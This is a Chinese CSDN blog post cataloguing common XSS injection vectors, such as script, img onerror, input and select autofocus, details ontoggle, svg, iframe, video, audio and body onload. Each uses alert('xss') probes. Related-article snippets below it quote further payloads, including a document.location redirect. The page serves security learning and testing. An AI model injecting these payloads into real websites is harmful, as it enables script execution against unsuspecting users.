XSS常用标签

最新推荐文章于 2024-04-14 21:29:25 发布
最新推荐文章于 2024-04-14 21:29:25 发布
阅读量3.4k 收藏 12
点赞数 2
文章标签: html5 html struts xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47306547/article/details/120340162
版权

目录

XSS常用标签

< script >

< img >

< input >

< details >

< svg >

< select >

< iframe >

< video >

< audio >

< body >

XSS常用标签

<script> alert("xss"); </script>

<img src=1 onerror=alert("xss");>

<input onfocus="alert('xss');">    
//竞争焦点,从而触发onbiur事件
<input onblur=alert('xss') autofocus><input autofocus>    
//通过 autofocus 属性执行本身的focus事件,这个向量是使焦点自动跳转到输入元素上,触发焦点事件,无需用户去触发
<input onfocus="alert('xss');"autofocus>

<details ontoggle="alert('xss');"></details>
// 使用open属性触发ontoggle事件,无需用户去触发
<details open ontoggle="alert('xss');"></details>

<svg onload="alert('xss')"></svg>>

<select onfocus=alert('xss')></select>
// 通过autofocus 属性执行本身的focus事件,这个向量是使焦点自动跳转到输入元素上,触发焦点事件,无需用户去触发
<select onfocus="alert('xss')" autofocus></select>

<iframe onload=alert("xss");></iframe>

<video><source onerror="alert('xss')"></video>

<audio src="x" onerror=alert('xss');></audio>

<body onload=alert('xss');></body>

利用换行符以及 autofocus ,自动取触发 onscroll 事件,无需用户去触发。

 

< script >

<!doctype html>
<html>
<head>
    <meta charset="utf-8">
    <title> This is a Test </title>
</head>

<body>

    <script>alert("This is a test about xss !");</script>

</body>
</html>

< img >

 

< input >

< details >

 

 

< svg >

 

< select >

 

< iframe >

 

< video >

 

< audio >

 

< body >

 

源十三
关注
网络安全-js安全知识点与XSS常用payloads_js 入xss的payload(1)
2401_84247760的博客
04-29 709
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。:字符串(String)、数字(Number)、布尔(Boolean)、对空(Null)、未定义(Undefined)、Symbol。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。
常用XSS检查语句
11-09
以下是一些常用XSS检查语句: 1. **基本的HTML注入测试**: ```html <script>alert('XSS'); ``` 这个语句会在用户的浏览器上弹出一个警告对话框,显示"XSS"。如果这个字符串未经过滤或转义,就可能被插入到...
XSS常见的触发标签
热门推荐
LYJ20010728的博客
05-06 1万+
无过滤情况 <script> <scirpt>alert("xss");</script> <img> 图片加载错误时触发 <img src="x" onerror=alert(1)> <img src="1" onerror=eval("alert('xss')")> 鼠标指针移动到元素时触发 <img src=1 onmouseover="alert(1)"> 鼠标指针移出时触发 <img src=1 onm
xss常用标签和触发事件
2301_81475812的博客
04-14 893
img src="x" onerror=document.location=``//www.baidu.com``>html标签中用//可以代替http://<img src="x" onerror="document.location=``http://www。<iframe src="javascript:prompt(``xss``)"></iframe>(````只有两个``)
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 6249
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
XSS漏洞-常见标签
weixin_61143354的博客
09-17 1717
网络安全笔记
xss 常用标签及绕过姿势总结 - FreeBuf网络安全行业门户.mhtml
最新发布
10-27
xss 常用标签及绕过姿势总结 - FreeBuf网络安全行业门户
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
写一下xss常用标签
03-14
XSS(跨站脚本攻击)的常用标签包括:、、、、、、、等。这些标签可以被攻击者利用来注入恶意代码,从而实现攻击目的。为了防止XSS攻击,我们需要对用户输入的数据进行过滤和转义,避免恶意代码的注入。
Pikachu(皮卡丘靶场)初识XSS(常见标签事件及payload总结)
Welcome To Myon'Blog !
11-14 2105
XSS又叫跨站脚本攻击,是HTML代码注入,通过对网页注入浏览器可执行代码,从而实现攻击。​。domxss 的函数从具有 id 为 "text" 的元素中获取输入值,然后将其作为链接的 href 属性值插入到具有 id 为 "dom" 的元素的 innerHTML 中。尝试它给的payload:'>通过在链接的 href 属性中闭合单引号,然后插入一个图片元素,该元素的 onmouseover 事件触发一个弹窗,显
XSS专栏之常见xss--总结备忘
键盘的起始页
02-25 1113
开始总结一些xss的想法。
XSS攻击
橙子的博客
01-02 2454
XSS攻击 原理 人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSSXSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实...
DVWA------XSS(全)
m0_65712192的博客
12-13 5790
DVWA-----XSS(全)
挖洞经验 | 可以被XSS利用的HTML标签和一些手段技巧,靠挖SRC漏洞每月多赚15k
jennycisp的博客
10-26 920
*”。**网上关于XSS的教程数不胜数,转载来转载去的,就是那么些Payload,可能看的人晕晕的不知所以然。而且还有很多Payload就算把其中的HTML代码闭合后写在自己的前端中,都不一定触发,因为很多老的标签和事件都已经被W3C给废弃了。本文首先给大家总结一下目前通用可以拿来构造XSSHTML标签和一些标签事件,然后再给大家讲述一些绕过的技巧,教你在么构造出属于你自己渗透时真正需要的Exp。
xss其他标签下的js用法总结大全
binggoogle的专栏
07-25 6177
xss其他标签下的js用法总结大全 https://www.91ri.org/16155.html 前段时间我遇到一个问题,就是说普通的平台获取cookie的语句为 实际上我们的测试语句可能为↓ alert("90sec") 也就是说js语句实际上是位于↓ 的中间。 包括、、、、、、标签等情况下的xss构造。 所以我们就需要了解各种标签下的js用法,不然很多时候不可以使用就很麻
XSS详解
cjdgg的博客
09-30 1121
在进行JavaScript解析的时候字符或者字符串仅会被解码为字符串文本或者标识符名称,在上例中Javascript解析器工作的时候将\u0061\u006c\u0065\u0072\u0074进行解码后为alert,而alert是一个有效的标识符名称,它是能被正常解析的。在处理诸如 这样的标签,解析器会自动切换到JS解析模式,而src、 href 后边加入的javascript 伪URL,也会进入JS 的解析模式,ON事件后面也会直接进入JS模式。
学习笔记-xss
weixin_44063924的博客
09-05 921
本文章仅作学习自用,若有不对欢迎批评斧正。 目录 一、XSS简介 二、XSS 跨站漏洞原理及分类 2.1原理 2.2分类 总结 一、XSS简介 人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。 跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值